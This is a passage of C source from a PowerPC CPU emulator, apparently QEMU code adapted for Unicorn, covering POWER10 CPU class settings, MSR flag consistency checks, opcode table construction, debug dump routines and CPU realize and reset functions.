PPC_FLOAT_EXT | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBSYNC | PPC_64B | PPC_64H | PPC_64BX | PPC_ALTIVEC | PPC_SEGMENT_64B | PPC_SLBI | PPC_POPCNTB | PPC_POPCNTWD | PPC_CILDST; pcc->insns_flags2 = PPC2_VSX | PPC2_VSX207 | PPC2_DFP | PPC2_DBRX | PPC2_PERM_ISA206 | PPC2_DIVE_ISA206 | PPC2_ATOMIC_ISA206 | PPC2_FP_CVT_ISA206 | PPC2_FP_TST_ISA206 | PPC2_BCTAR_ISA207 | PPC2_LSQ_ISA207 | PPC2_ALTIVEC_207 | PPC2_ISA205 | PPC2_ISA207S | PPC2_FP_CVT_S64 | PPC2_TM | PPC2_ISA300 | PPC2_PRCNTL; pcc->msr_mask = (1ull << MSR_SF) | (1ull << MSR_HV) | (1ull << MSR_TM) | (1ull << MSR_VR) | (1ull << MSR_VSX) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->lpcr_mask = LPCR_VPM1 | LPCR_ISL | LPCR_KBV | LPCR_DPFD | (LPCR_PECE_U_MASK & LPCR_HVEE) | LPCR_ILE | LPCR_AIL | LPCR_UPRT | LPCR_EVIRT | LPCR_ONL | LPCR_HR | LPCR_LD | (LPCR_PECE_L_MASK & (LPCR_PDEE | LPCR_HDEE | LPCR_EEE | LPCR_DEE | LPCR_OEE)) | LPCR_MER | LPCR_GTSE | LPCR_TC | LPCR_HEIC | LPCR_LPES0 | LPCR_HVICE | LPCR_HDICE; pcc->lpcr_pm = LPCR_PDEE | LPCR_HDEE | LPCR_EEE | LPCR_DEE | LPCR_OEE; pcc->mmu_model = POWERPC_MMU_3_00; pcc->handle_mmu_fault = ppc64_v3_handle_mmu_fault; /* segment page size remain the same */ pcc->hash64_opts = &ppc_hash64_opts_POWER7; pcc->radix_page_info = &POWER10_radix_page_info; pcc->lrg_decr_bits = 56; pcc->excp_model = POWERPC_EXCP_POWER9; pcc->bus_model = PPC_FLAGS_INPUT_POWER9; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK | POWERPC_FLAG_CFAR | POWERPC_FLAG_VSX | POWERPC_FLAG_TM; pcc->l1_dcache_size = 0x8000; pcc->l1_icache_size = 0x8000; pcc->interrupts_big_endian = ppc_cpu_interrupts_big_endian_lpcr; } #if 0 void cpu_ppc_set_vhyp(PowerPCCPU *cpu, PPCVirtualHypervisor *vhyp) { CPUPPCState *env = &cpu->env; cpu->vhyp = vhyp; /* * With a virtual hypervisor mode we never allow the CPU to go * hypervisor mode itself */ env->msr_mask &= ~MSR_HVB; } #endif #endif /* defined(TARGET_PPC64) */ /*****************************************************************************/ /* Generic CPU instantiation routine */ static void init_ppc_proc(PowerPCCPU *cpu) { PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); CPUPPCState *env = &cpu->env; int i; env->irq_inputs = NULL; /* Set all exception vectors to an invalid address */ for (i = 0; i < POWERPC_EXCP_NB; i++) { #ifdef _MSC_VER env->excp_vectors[i] = (target_ulong)(0ULL - 1ULL); #else env->excp_vectors[i] = (target_ulong)(-1ULL); #endif } env->ivor_mask = 0x00000000; env->ivpr_mask = 0x00000000; /* Default MMU definitions */ env->nb_BATs = 0; env->nb_tlb = 0; env->nb_ways = 0; env->tlb_type = TLB_NONE; /* Register SPR common to all PowerPC implementations */ gen_spr_generic(env); spr_register(env, SPR_PVR, "PVR", /* Linux permits userspace to read PVR */ SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, pcc->pvr); /* Register SVR if it's defined to anything else than POWERPC_SVR_NONE */ if (pcc->svr != POWERPC_SVR_NONE) { if (pcc->svr & POWERPC_SVR_E500) { spr_register(env, SPR_E500_SVR, "SVR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, pcc->svr & ~POWERPC_SVR_E500); } else { spr_register(env, SPR_SVR, "SVR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, pcc->svr); } } /* PowerPC implementation specific initialisations (SPRs, timers, ...) */ (*pcc->init_proc)(env); #if 0 ppc_gdb_gen_spr_xml(cpu); #endif /* MSR bits & flags consistency checks */ if (env->msr_mask & (1 << 25)) { switch (env->flags & (POWERPC_FLAG_SPE | POWERPC_FLAG_VRE)) { case POWERPC_FLAG_SPE: case POWERPC_FLAG_VRE: break; default: fprintf(stderr, "PowerPC MSR definition inconsistency\n" "Should define POWERPC_FLAG_SPE or POWERPC_FLAG_VRE\n"); exit(1); } } else if (env->flags & (POWERPC_FLAG_SPE | POWERPC_FLAG_VRE)) { fprintf(stderr, "PowerPC MSR definition inconsistency\n" "Should not define POWERPC_FLAG_SPE nor POWERPC_FLAG_VRE\n"); exit(1); } if (env->msr_mask & (1 << 17)) { switch (env->flags & (POWERPC_FLAG_TGPR | POWERPC_FLAG_CE)) { case POWERPC_FLAG_TGPR: case POWERPC_FLAG_CE: break; default: fprintf(stderr, "PowerPC MSR definition inconsistency\n" "Should define POWERPC_FLAG_TGPR or POWERPC_FLAG_CE\n"); exit(1); } } else if (env->flags & (POWERPC_FLAG_TGPR | POWERPC_FLAG_CE)) { fprintf(stderr, "PowerPC MSR definition inconsistency\n" "Should not define POWERPC_FLAG_TGPR nor POWERPC_FLAG_CE\n"); exit(1); } if (env->msr_mask & (1 << 10)) { switch (env->flags & (POWERPC_FLAG_SE | POWERPC_FLAG_DWE | POWERPC_FLAG_UBLE)) { case POWERPC_FLAG_SE: case POWERPC_FLAG_DWE: case POWERPC_FLAG_UBLE: break; default: fprintf(stderr, "PowerPC MSR definition inconsistency\n" "Should define POWERPC_FLAG_SE or POWERPC_FLAG_DWE or " "POWERPC_FLAG_UBLE\n"); exit(1); } } else if (env->flags & (POWERPC_FLAG_SE | POWERPC_FLAG_DWE | POWERPC_FLAG_UBLE)) { fprintf(stderr, "PowerPC MSR definition inconsistency\n" "Should not define POWERPC_FLAG_SE nor POWERPC_FLAG_DWE nor " "POWERPC_FLAG_UBLE\n"); exit(1); } if (env->msr_mask & (1 << 9)) { switch (env->flags & (POWERPC_FLAG_BE | POWERPC_FLAG_DE)) { case POWERPC_FLAG_BE: case POWERPC_FLAG_DE: break; default: fprintf(stderr, "PowerPC MSR definition inconsistency\n" "Should define POWERPC_FLAG_BE or POWERPC_FLAG_DE\n"); exit(1); } } else if (env->flags & (POWERPC_FLAG_BE | POWERPC_FLAG_DE)) { fprintf(stderr, "PowerPC MSR definition inconsistency\n" "Should not define POWERPC_FLAG_BE nor POWERPC_FLAG_DE\n"); exit(1); } if (env->msr_mask & (1 << 2)) { switch (env->flags & (POWERPC_FLAG_PX | POWERPC_FLAG_PMM)) { case POWERPC_FLAG_PX: case POWERPC_FLAG_PMM: break; default: fprintf(stderr, "PowerPC MSR definition inconsistency\n" "Should define POWERPC_FLAG_PX or POWERPC_FLAG_PMM\n"); exit(1); } } else if (env->flags & (POWERPC_FLAG_PX | POWERPC_FLAG_PMM)) { fprintf(stderr, "PowerPC MSR definition inconsistency\n" "Should not define POWERPC_FLAG_PX nor POWERPC_FLAG_PMM\n"); exit(1); } if ((env->flags & (POWERPC_FLAG_RTC_CLK | POWERPC_FLAG_BUS_CLK)) == 0) { fprintf(stderr, "PowerPC flags inconsistency\n" "Should define the time-base and decrementer clock source\n"); exit(1); } /* Allocate TLBs buffer when needed */ if (env->nb_tlb != 0) { int nb_tlb = env->nb_tlb; if (env->id_tlbs != 0) { nb_tlb *= 2; } switch (env->tlb_type) { case TLB_6XX: env->tlb.tlb6 = g_new0(ppc6xx_tlb_t, nb_tlb); break; case TLB_EMB: env->tlb.tlbe = g_new0(ppcemb_tlb_t, nb_tlb); break; case TLB_MAS: env->tlb.tlbm = g_new0(ppcmas_tlb_t, nb_tlb); break; } /* Pre-compute some useful values */ env->tlb_per_way = env->nb_tlb / env->nb_ways; } #if 0 if (env->irq_inputs == NULL) { warn_report("no internal IRQ controller registered." " Attempt QEMU to crash very soon !"); } if (env->check_pow == NULL) { warn_report("no power management check handler registered." " Attempt QEMU to crash very soon !"); } #endif } #if defined(PPC_DUMP_CPU) static void dump_ppc_sprs(CPUPPCState *env) { ppc_spr_t *spr; uint32_t sr, sw; uint32_t ur, uw; int i, j, n; printf("Special purpose registers:\n"); for (i = 0; i < 32; i++) { for (j = 0; j < 32; j++) { n = (i << 5) | j; spr = &env->spr_cb[n]; uw = spr->uea_write != NULL && spr->uea_write != SPR_NOACCESS; ur = spr->uea_read != NULL && spr->uea_read != SPR_NOACCESS; sw = spr->oea_write != NULL && spr->oea_write != SPR_NOACCESS; sr = spr->oea_read != NULL && spr->oea_read != SPR_NOACCESS; if (sw || sr || uw || ur) { printf("SPR: %4d (%03x) %-8s s%c%c u%c%c\n", (i << 5) | j, (i << 5) | j, spr->name, sw ? 'w' : '-', sr ? 'r' : '-', uw ? 'w' : '-', ur ? 'r' : '-'); } } } fflush(stdout); fflush(stderr); } #endif /*****************************************************************************/ /* Opcode types */ enum { PPC_DIRECT = 0, /* Opcode routine */ PPC_INDIRECT = 1, /* Indirect opcode table */ }; #define PPC_OPCODE_MASK 0x3 static inline int is_indirect_opcode(void *handler) { return ((uintptr_t)handler & PPC_OPCODE_MASK) == PPC_INDIRECT; } static inline opc_handler_t **ind_table(void *handler) { return (opc_handler_t **)((uintptr_t)handler & ~PPC_OPCODE_MASK); } /* Instruction table creation */ /* Opcodes tables creation */ static void fill_new_table(opc_handler_t **table, int len) { int i; for (i = 0; i < len; i++) { table[i] = &invalid_handler; } } static int create_new_table(opc_handler_t **table, unsigned char idx) { opc_handler_t **tmp; tmp = g_new(opc_handler_t *, PPC_CPU_INDIRECT_OPCODES_LEN); fill_new_table(tmp, PPC_CPU_INDIRECT_OPCODES_LEN); table[idx] = (opc_handler_t *)((uintptr_t)tmp | PPC_INDIRECT); return 0; } static int insert_in_table(opc_handler_t **table, unsigned char idx, opc_handler_t *handler) { if (table[idx] != &invalid_handler) { return -1; } table[idx] = handler; return 0; } static int register_direct_insn(opc_handler_t **ppc_opcodes, unsigned char idx, opc_handler_t *handler) { if (insert_in_table(ppc_opcodes, idx, handler) < 0) { printf("*** ERROR: opcode %02x already assigned in main " "opcode table\n", idx); #if defined(DO_PPC_STATISTICS) || defined(PPC_DUMP_CPU) printf(" Registered handler '%s' - new handler '%s'\n", ppc_opcodes[idx]->oname, handler->oname); #endif return -1; } return 0; } static int register_ind_in_table(opc_handler_t **table, unsigned char idx1, unsigned char idx2, opc_handler_t *handler) { if (table[idx1] == &invalid_handler) { if (create_new_table(table, idx1) < 0) { printf("*** ERROR: unable to create indirect table " "idx=%02x\n", idx1); return -1; } } else { if (!is_indirect_opcode(table[idx1])) { printf("*** ERROR: idx %02x already assigned to a direct " "opcode\n", idx1); #if defined(DO_PPC_STATISTICS) || defined(PPC_DUMP_CPU) printf(" Registered handler '%s' - new handler '%s'\n", ind_table(table[idx1])[idx2]->oname, handler->oname); #endif return -1; } } if (handler != NULL && insert_in_table(ind_table(table[idx1]), idx2, handler) < 0) { printf("*** ERROR: opcode %02x already assigned in " "opcode table %02x\n", idx2, idx1); #if defined(DO_PPC_STATISTICS) || defined(PPC_DUMP_CPU) printf(" Registered handler '%s' - new handler '%s'\n", ind_table(table[idx1])[idx2]->oname, handler->oname); #endif return -1; } return 0; } static int register_ind_insn(opc_handler_t **ppc_opcodes, unsigned char idx1, unsigned char idx2, opc_handler_t *handler) { return register_ind_in_table(ppc_opcodes, idx1, idx2, handler); } static int register_dblind_insn(opc_handler_t **ppc_opcodes, unsigned char idx1, unsigned char idx2, unsigned char idx3, opc_handler_t *handler) { if (register_ind_in_table(ppc_opcodes, idx1, idx2, NULL) < 0) { printf("*** ERROR: unable to join indirect table idx " "[%02x-%02x]\n", idx1, idx2); return -1; } if (register_ind_in_table(ind_table(ppc_opcodes[idx1]), idx2, idx3, handler) < 0) { printf("*** ERROR: unable to insert opcode " "[%02x-%02x-%02x]\n", idx1, idx2, idx3); return -1; } return 0; } static int register_trplind_insn(opc_handler_t **ppc_opcodes, unsigned char idx1, unsigned char idx2, unsigned char idx3, unsigned char idx4, opc_handler_t *handler) { opc_handler_t **table; if (register_ind_in_table(ppc_opcodes, idx1, idx2, NULL) < 0) { printf("*** ERROR: unable to join indirect table idx " "[%02x-%02x]\n", idx1, idx2); return -1; } table = ind_table(ppc_opcodes[idx1]); if (register_ind_in_table(table, idx2, idx3, NULL) < 0) { printf("*** ERROR: unable to join 2nd-level indirect table idx " "[%02x-%02x-%02x]\n", idx1, idx2, idx3); return -1; } table = ind_table(table[idx2]); if (register_ind_in_table(table, idx3, idx4, handler) < 0) { printf("*** ERROR: unable to insert opcode " "[%02x-%02x-%02x-%02x]\n", idx1, idx2, idx3, idx4); return -1; } return 0; } static int register_insn(opc_handler_t **ppc_opcodes, opcode_t *insn) { if (insn->opc2 != 0xFF) { if (insn->opc3 != 0xFF) { if (insn->opc4 != 0xFF) { if (register_trplind_insn(ppc_opcodes, insn->opc1, insn->opc2, insn->opc3, insn->opc4, &insn->handler) < 0) { return -1; } } else { if (register_dblind_insn(ppc_opcodes, insn->opc1, insn->opc2, insn->opc3, &insn->handler) < 0) { return -1; } } } else { if (register_ind_insn(ppc_opcodes, insn->opc1, insn->opc2, &insn->handler) < 0) { return -1; } } } else { if (register_direct_insn(ppc_opcodes, insn->opc1, &insn->handler) < 0) { return -1; } } return 0; } static int test_opcode_table(opc_handler_t **table, int len) { int i, count, tmp; for (i = 0, count = 0; i < len; i++) { /* Consistency fixup */ if (table[i] == NULL) { table[i] = &invalid_handler; } if (table[i] != &invalid_handler) { if (is_indirect_opcode(table[i])) { tmp = test_opcode_table(ind_table(table[i]), PPC_CPU_INDIRECT_OPCODES_LEN); if (tmp == 0) { free(table[i]); table[i] = &invalid_handler; } else { count++; } } else { count++; } } } return count; } static void fix_opcode_tables(opc_handler_t **ppc_opcodes) { if (test_opcode_table(ppc_opcodes, PPC_CPU_OPCODES_LEN) == 0) { printf("*** WARNING: no opcode defined !\n"); } } /*****************************************************************************/ static int create_ppc_opcodes(PowerPCCPU *cpu) { PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); opcode_t *opc; fill_new_table(cpu->opcodes, PPC_CPU_OPCODES_LEN); for (opc = opcodes; opc < &opcodes[ARRAY_SIZE(opcodes)]; opc++) { if (((opc->handler.type & pcc->insns_flags) != 0) || ((opc->handler.type2 & pcc->insns_flags2) != 0)) { if (register_insn(cpu->opcodes, opc) < 0) { #if 0 error_setg(errp, "ERROR initializing PowerPC instruction " "0x%02x 0x%02x 0x%02x", opc->opc1, opc->opc2, opc->opc3); #endif return 1; } } } fix_opcode_tables(cpu->opcodes); fflush(stdout); fflush(stderr); return 0; } #if defined(PPC_DUMP_CPU) static void dump_ppc_insns(CPUPPCState *env) { opc_handler_t **table, *handler; const char *p, *q; uint8_t opc1, opc2, opc3, opc4; printf("Instructions set:\n"); /* opc1 is 6 bits long */ for (opc1 = 0x00; opc1 < PPC_CPU_OPCODES_LEN; opc1++) { table = env->opcodes; handler = table[opc1]; if (is_indirect_opcode(handler)) { /* opc2 is 5 bits long */ for (opc2 = 0; opc2 < PPC_CPU_INDIRECT_OPCODES_LEN; opc2++) { table = env->opcodes; handler = env->opcodes[opc1]; table = ind_table(handler); handler = table[opc2]; if (is_indirect_opcode(handler)) { table = ind_table(handler); /* opc3 is 5 bits long */ for (opc3 = 0; opc3 < PPC_CPU_INDIRECT_OPCODES_LEN; opc3++) { handler = table[opc3]; if (is_indirect_opcode(handler)) { table = ind_table(handler); /* opc4 is 5 bits long */ for (opc4 = 0; opc4 < PPC_CPU_INDIRECT_OPCODES_LEN; opc4++) { handler = table[opc4]; if (handler->handler != &gen_invalid) { printf("INSN: %02x %02x %02x %02x -- " "(%02d %04d %02d) : %s\n", opc1, opc2, opc3, opc4, opc1, (opc3 << 5) | opc2, opc4, handler->oname); } } } else { if (handler->handler != &gen_invalid) { /* Special hack to properly dump SPE insns */ p = strchr(handler->oname, '_'); if (p == NULL) { printf("INSN: %02x %02x %02x (%02d %04d) : " "%s\n", opc1, opc2, opc3, opc1, (opc3 << 5) | opc2, handler->oname); } else { q = "speundef"; if ((p - handler->oname) != strlen(q) || (memcmp(handler->oname, q, strlen(q)) != 0)) { /* First instruction */ printf("INSN: %02x %02x %02x" "(%02d %04d) : %.*s\n", opc1, opc2 << 1, opc3, opc1, (opc3 << 6) | (opc2 << 1), (int)(p - handler->oname), handler->oname); } if (strcmp(p + 1, q) != 0) { /* Second instruction */ printf("INSN: %02x %02x %02x " "(%02d %04d) : %s\n", opc1, (opc2 << 1) | 1, opc3, opc1, (opc3 << 6) | (opc2 << 1) | 1, p + 1); } } } } } } else { if (handler->handler != &gen_invalid) { printf("INSN: %02x %02x -- (%02d %04d) : %s\n", opc1, opc2, opc1, opc2, handler->oname); } } } } else { if (handler->handler != &gen_invalid) { printf("INSN: %02x -- -- (%02d ----) : %s\n", opc1, opc1, handler->oname); } } } } #endif #if 0 static bool avr_need_swap(CPUPPCState *env) { #ifdef HOST_WORDS_BIGENDIAN return msr_le; #else return !msr_le; #endif } static int gdb_find_spr_idx(CPUPPCState *env, int n) { int i; for (i = 0; i < ARRAY_SIZE(env->spr_cb); i++) { ppc_spr_t *spr = &env->spr_cb[i]; if (spr->name && spr->gdb_id == n) { return i; } } return -1; } static int gdb_get_spr_reg(CPUPPCState *env, GByteArray *buf, int n) { int reg; int len; reg = gdb_find_spr_idx(env, n); if (reg < 0) { return 0; } len = TARGET_LONG_SIZE; gdb_get_regl(buf, env->spr[reg]); ppc_maybe_bswap_register(env, gdb_get_reg_ptr(buf, len), len); return len; } static int gdb_set_spr_reg(CPUPPCState *env, uint8_t *mem_buf, int n) { int reg; int len; reg = gdb_find_spr_idx(env, n); if (reg < 0) { return 0; } len = TARGET_LONG_SIZE; ppc_maybe_bswap_register(env, mem_buf, len); env->spr[reg] = ldn_p(mem_buf, len); return len; } static int gdb_get_float_reg(CPUPPCState *env, GByteArray *buf, int n) { uint8_t *mem_buf; if (n < 32) { gdb_get_reg64(buf, *cpu_fpr_ptr(env, n)); mem_buf = gdb_get_reg_ptr(buf, 8); ppc_maybe_bswap_register(env, mem_buf, 8); return 8; } if (n == 32) { gdb_get_reg32(buf, env->fpscr); mem_buf = gdb_get_reg_ptr(buf, 4); ppc_maybe_bswap_register(env, mem_buf, 4); return 4; } return 0; } static int gdb_set_float_reg(CPUPPCState *env, uint8_t *mem_buf, int n) { if (n < 32) { ppc_maybe_bswap_register(env, mem_buf, 8); *cpu_fpr_ptr(env, n) = ldfq_p(mem_buf); return 8; } if (n == 32) { ppc_maybe_bswap_register(env, mem_buf, 4); helper_store_fpscr(env, ldl_p(mem_buf), 0xffffffff); return 4; } return 0; } static int gdb_get_avr_reg(CPUPPCState *env, GByteArray *buf, int n) { uint8_t *mem_buf; if (n < 32) { ppc_avr_t *avr = cpu_avr_ptr(env, n); if (!avr_need_swap(env)) { gdb_get_reg128(buf, avr->u64[0] , avr->u64[1]); } else { gdb_get_reg128(buf, avr->u64[1] , avr->u64[0]); } mem_buf = gdb_get_reg_ptr(buf, 16); ppc_maybe_bswap_register(env, mem_buf, 8); ppc_maybe_bswap_register(env, mem_buf + 8, 8); return 16; } if (n == 32) { gdb_get_reg32(buf, helper_mfvscr(env)); mem_buf = gdb_get_reg_ptr(buf, 4); ppc_maybe_bswap_register(env, mem_buf, 4); return 4; } if (n == 33) { gdb_get_reg32(buf, (uint32_t)env->spr[SPR_VRSAVE]); mem_buf = gdb_get_reg_ptr(buf, 4); ppc_maybe_bswap_register(env, mem_buf, 4); return 4; } return 0; } static int gdb_set_avr_reg(CPUPPCState *env, uint8_t *mem_buf, int n) { if (n < 32) { ppc_avr_t *avr = cpu_avr_ptr(env, n); ppc_maybe_bswap_register(env, mem_buf, 8); ppc_maybe_bswap_register(env, mem_buf + 8, 8); if (!avr_need_swap(env)) { avr->u64[0] = ldq_p(mem_buf); avr->u64[1] = ldq_p(mem_buf + 8); } else { avr->u64[1] = ldq_p(mem_buf); avr->u64[0] = ldq_p(mem_buf + 8); } return 16; } if (n == 32) { ppc_maybe_bswap_register(env, mem_buf, 4); helper_mtvscr(env, ldl_p(mem_buf)); return 4; } if (n == 33) { ppc_maybe_bswap_register(env, mem_buf, 4); env->spr[SPR_VRSAVE] = (target_ulong)ldl_p(mem_buf); return 4; } return 0; } static int gdb_get_spe_reg(CPUPPCState *env, GByteArray *buf, int n) { if (n < 32) { #if defined(TARGET_PPC64) gdb_get_reg32(buf, env->gpr[n] >> 32); ppc_maybe_bswap_register(env, gdb_get_reg_ptr(buf, 4), 4); #else gdb_get_reg32(buf, env->gprh[n]); #endif return 4; } if (n == 32) { gdb_get_reg64(buf, env->spe_acc); ppc_maybe_bswap_register(env, gdb_get_reg_ptr(buf, 8), 8); return 8; } if (n == 33) { gdb_get_reg32(buf, env->spe_fscr); ppc_maybe_bswap_register(env, gdb_get_reg_ptr(buf, 4), 4); return 4; } return 0; } static int gdb_set_spe_reg(CPUPPCState *env, uint8_t *mem_buf, int n) { if (n < 32) { #if defined(TARGET_PPC64) target_ulong lo = (uint32_t)env->gpr[n]; target_ulong hi; ppc_maybe_bswap_register(env, mem_buf, 4); hi = (target_ulong)ldl_p(mem_buf) << 32; env->gpr[n] = lo | hi; #else env->gprh[n] = ldl_p(mem_buf); #endif return 4; } if (n == 32) { ppc_maybe_bswap_register(env, mem_buf, 8); env->spe_acc = ldq_p(mem_buf); return 8; } if (n == 33) { ppc_maybe_bswap_register(env, mem_buf, 4); env->spe_fscr = ldl_p(mem_buf); return 4; } return 0; } static int gdb_get_vsx_reg(CPUPPCState *env, GByteArray *buf, int n) { if (n < 32) { gdb_get_reg64(buf, *cpu_vsrl_ptr(env, n)); ppc_maybe_bswap_register(env, gdb_get_reg_ptr(buf, 8), 8); return 8; } return 0; } static int gdb_set_vsx_reg(CPUPPCState *env, uint8_t *mem_buf, int n) { if (n < 32) { ppc_maybe_bswap_register(env, mem_buf, 8); *cpu_vsrl_ptr(env, n) = ldq_p(mem_buf); return 8; } return 0; } #endif static int ppc_fixup_cpu(PowerPCCPU *cpu) { CPUPPCState *env = &cpu->env; /* * TCG doesn't (yet) emulate some groups of instructions that are * implemented on some otherwise supported CPUs (e.g. VSX and * decimal floating point instructions on POWER7). We remove * unsupported instruction groups from the cpu state's instruction * masks and hope the guest can cope. For at least the pseries * machine, the unavailability of these instructions can be * advertised to the guest via the device tree. */ if ((env->insns_flags & ~PPC_TCG_INSNS) || (env->insns_flags2 & ~PPC_TCG_INSNS2)) { #if 0 warn_report("Disabling some instructions which are not " "emulated by TCG (0x%" PRIx64 ", 0x%" PRIx64 ")", env->insns_flags & ~PPC_TCG_INSNS, env->insns_flags2 & ~PPC_TCG_INSNS2); #endif } env->insns_flags &= PPC_TCG_INSNS; env->insns_flags2 &= PPC_TCG_INSNS2; return 0; } static void ppc_cpu_realize(struct uc_struct *uc, CPUState *dev) { CPUState *cs = CPU(dev); PowerPCCPU *cpu = POWERPC_CPU(dev); #if 0 PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); #endif cpu_exec_realizefn(cs); if (cpu->vcpu_id == UNASSIGNED_CPU_INDEX) { cpu->vcpu_id = cs->cpu_index; } if (ppc_fixup_cpu(cpu) != 0) { goto unrealize; } if (create_ppc_opcodes(cpu) != 0) { goto unrealize; } init_ppc_proc(cpu); #if defined(PPC_DUMP_CPU) { CPUPPCState *env = &cpu->env; const char *mmu_model, *excp_model, *bus_model; switch (env->mmu_model) { case POWERPC_MMU_32B: mmu_model = "PowerPC 32"; break; case POWERPC_MMU_SOFT_6xx: mmu_model = "PowerPC 6xx/7xx with software driven TLBs"; break; case POWERPC_MMU_SOFT_74xx: mmu_model = "PowerPC 74xx with software driven TLBs"; break; case POWERPC_MMU_SOFT_4xx: mmu_model = "PowerPC 4xx with software driven TLBs"; break; case POWERPC_MMU_SOFT_4xx_Z: mmu_model = "PowerPC 4xx with software driven TLBs " "and zones protections"; break; case POWERPC_MMU_REAL: mmu_model = "PowerPC real mode only"; break; case POWERPC_MMU_MPC8xx: mmu_model = "PowerPC MPC8xx"; break; case POWERPC_MMU_BOOKE: mmu_model = "PowerPC BookE"; break; case POWERPC_MMU_BOOKE206: mmu_model = "PowerPC BookE 2.06"; break; case POWERPC_MMU_601: mmu_model = "PowerPC 601"; break; #if defined(TARGET_PPC64) case POWERPC_MMU_64B: mmu_model = "PowerPC 64"; break; #endif default: mmu_model = "Unknown or invalid"; break; } switch (env->excp_model) { case POWERPC_EXCP_STD: excp_model = "PowerPC"; break; case POWERPC_EXCP_40x: excp_model = "PowerPC 40x"; break; case POWERPC_EXCP_601: excp_model = "PowerPC 601"; break; case POWERPC_EXCP_602: excp_model = "PowerPC 602"; break; case POWERPC_EXCP_603: excp_model = "PowerPC 603"; break; case POWERPC_EXCP_603E: excp_model = "PowerPC 603e"; break; case POWERPC_EXCP_604: excp_model = "PowerPC 604"; break; case POWERPC_EXCP_7x0: excp_model = "PowerPC 740/750"; break; case POWERPC_EXCP_7x5: excp_model = "PowerPC 745/755"; break; case POWERPC_EXCP_74xx: excp_model = "PowerPC 74xx"; break; case POWERPC_EXCP_BOOKE: excp_model = "PowerPC BookE"; break; #if defined(TARGET_PPC64) case POWERPC_EXCP_970: excp_model = "PowerPC 970"; break; #endif default: excp_model = "Unknown or invalid"; break; } switch (env->bus_model) { case PPC_FLAGS_INPUT_6xx: bus_model = "PowerPC 6xx"; break; case PPC_FLAGS_INPUT_BookE: bus_model = "PowerPC BookE"; break; case PPC_FLAGS_INPUT_405: bus_model = "PowerPC 405"; break; case PPC_FLAGS_INPUT_401: bus_model = "PowerPC 401/403"; break; case PPC_FLAGS_INPUT_RCPU: bus_model = "RCPU / MPC8xx"; break; #if defined(TARGET_PPC64) case PPC_FLAGS_INPUT_970: bus_model = "PowerPC 970"; break; #endif default: bus_model = "Unknown or invalid"; break; } printf("PowerPC %-12s : PVR %08x MSR %016" PRIx64 "\n" " MMU model : %s\n", object_class_get_name(OBJECT_CLASS(pcc)), pcc->pvr, pcc->msr_mask, mmu_model); if (env->tlb.tlb6) { printf(" %d %s TLB in %d ways\n", env->nb_tlb, env->id_tlbs ? "splitted" : "merged", env->nb_ways); } printf(" Exceptions model : %s\n" " Bus model : %s\n", excp_model, bus_model); printf(" MSR features :\n"); if (env->flags & POWERPC_FLAG_SPE) { printf(" signal processing engine enable" "\n"); } else if (env->flags & POWERPC_FLAG_VRE) { printf(" vector processor enable\n"); } if (env->flags & POWERPC_FLAG_TGPR) { printf(" temporary GPRs\n"); } else if (env->flags & POWERPC_FLAG_CE) { printf(" critical input enable\n"); } if (env->flags & POWERPC_FLAG_SE) { printf(" single-step trace mode\n"); } else if (env->flags & POWERPC_FLAG_DWE) { printf(" debug wait enable\n"); } else if (env->flags & POWERPC_FLAG_UBLE) { printf(" user BTB lock enable\n"); } if (env->flags & POWERPC_FLAG_BE) { printf(" branch-step trace mode\n"); } else if (env->flags & POWERPC_FLAG_DE) { printf(" debug interrupt enable\n"); } if (env->flags & POWERPC_FLAG_PX) { printf(" inclusive protection\n"); } else if (env->flags & POWERPC_FLAG_PMM) { printf(" performance monitor mark\n"); } if (env->flags == POWERPC_FLAG_NONE) { printf(" none\n"); } printf(" Time-base/decrementer clock source: %s\n", env->flags & POWERPC_FLAG_RTC_CLK ? "RTC clock" : "bus clock"); dump_ppc_insns(env); dump_ppc_sprs(env); fflush(stdout); } #endif return; unrealize: cpu_exec_unrealizefn(cs); } void ppc_cpu_unrealize(CPUState *dev) { PowerPCCPU *cpu = POWERPC_CPU(dev); opc_handler_t **table, **table_2; int i, j, k; for (i = 0; i < PPC_CPU_OPCODES_LEN; i++) { if (cpu->opcodes[i] == &invalid_handler) { continue; } if (is_indirect_opcode(cpu->opcodes[i])) { table = ind_table(cpu->opcodes[i]); for (j = 0; j < PPC_CPU_INDIRECT_OPCODES_LEN; j++) { if (table[j] == &invalid_handler) { continue; } if (is_indirect_opcode(table[j])) { table_2 = ind_table(table[j]); for (k = 0; k < PPC_CPU_INDIRECT_OPCODES_LEN; k++) { if (table_2[k] != &invalid_handler && is_indirect_opcode(table_2[k])) { g_free((opc_handler_t *)((uintptr_t)table_2[k] & ~PPC_INDIRECT)); } } g_free((opc_handler_t *)((uintptr_t)table[j] & ~PPC_INDIRECT)); } } g_free((opc_handler_t *)((uintptr_t)cpu->opcodes[i] & ~PPC_INDIRECT)); } } } static void ppc_cpu_set_pc(CPUState *cs, vaddr value) { PowerPCCPU *cpu = POWERPC_CPU(cs); cpu->env.nip = value; } static bool ppc_cpu_has_work(CPUState *cs) { PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = &cpu->env; return msr_ee && (cs->interrupt_request & CPU_INTERRUPT_HARD); } static void ppc_cpu_reset(CPUState *dev) { CPUState *s = CPU(dev); PowerPCCPU *cpu = POWERPC_CPU(s); PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); CPUPPCState *env = &cpu->env; target_ulong msr; int i; pcc->parent_reset(dev); msr = (target_ulong)0; msr |= (target_ulong)MSR_HVB; msr |= (target_ulong)0 << MSR_AP; /* TO BE 